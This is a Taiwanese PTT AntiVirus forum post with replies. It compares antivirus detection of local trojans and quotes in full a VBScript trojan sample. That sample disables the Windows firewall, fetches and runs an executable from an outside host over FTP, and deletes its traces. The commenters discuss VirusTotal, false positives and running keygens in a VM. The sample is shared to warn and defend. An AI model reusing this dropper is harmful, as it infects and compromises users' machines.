看板 AntiVirus 關於我們 聯絡資訊
使用心得 Avira偵測率很高,一些在VirusTotal上面Kaspersky偵測不到的"台灣常見木馬" 小紅傘都會偵測出來...而且,病毒回報之後更新速度很快 趨勢同樣對台灣的木馬偵測率不錯 Kaspersky回報病毒更新速度算快... Symantec,Avast...我懷疑我的回報信被丟掉了... 以上,偵測效果的部份,除了Avira我有裝,其他都是看VirusTotal上面的結果 不過,Avria在我電腦偵測出來的話,VT上面也會有 所以他靠得是病毒馬,不是甚麼行為分析 有些像Bitdefender號稱有行為分析的,我就沒有用過了 Set kk = CreateObject("Wscript.Shell") kk.run "cmd /c net stop sharedaccess&echo open www.g03z.com>>i.i&echo aa33>>i.i&echo bb33>>i.i&echo recv s s.exe>>i.i&echo bye>>i.i&ftp -s:i.i&del i.i&s.exe&del q.vbs&del s.exe&start http://buy.yahoo.com.tw/&del ? ?.bat",0 最後,不知道在外面流傳這樣的木馬有多少 不過,如果你家小孩老人很喜歡亂點email裡面的附件 還是把windows裡面的ftp.exe刪掉,或是封鎖起來吧 -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 140.123.102.167
kissahping:不應該用VirusTotal看回報結果……而且小紅傘很多都是 05/19 14:28
kissahping:誤報或報殼,之前上報過許多誤報的樣本,上報後紅傘才 05/19 14:29
kissahping:更正為誤報。= = 05/19 14:29
kissahping:而且很多軟體對病毒的定義不同,曾經有好幾次上報卡巴 05/19 14:30
kissahping:(其他程式認定有問題),但卡巴的回信沒有問題: 05/19 14:33
kissahping:No malicious code were found in these files. 05/19 14:34
kissahping:有更多還是已經沒有作用的毀損檔案,病毒沒作用還能算 05/19 14:36
kissahping:是病毒嗎?就只是一個無效檔案罷了。 05/19 14:36
jlovet:因為我確定他是病毒阿....而且每個星期都在更新... 05/19 14:42
jlovet:喔,還有一個習慣就是,keygen要用guest帳號去開.... 05/19 14:45
pttdog:內行 05/19 15:22
kissahping:keygen,我習慣是上報後,等防毒公司的回報結果再用。 05/19 15:32
kissahping:不過我不太用keygen就是了。 05/19 15:33
kissahping:有些確定是病毒檔,但已經無執行能力,很多防毒一樣是 05/19 15:34
kissahping:不會報的,因為沒有實質意義。 05/19 15:34
hgking:keygen個人習慣丟到VM裡跑 比較安心 05/19 16:15
jlovet:奧客嗎? 幫你分析keygen... 05/19 16:49
kissahping:呃…那是該軟體的服務(COMODO pro)…… = = 05/19 16:53
kissahping:看來你不知道有些公司本來就提供用戶的線上支援。 05/19 16:55
kissahping:而且我都用自由軟體,keygen通常是拿來玩的。 05/19 16:58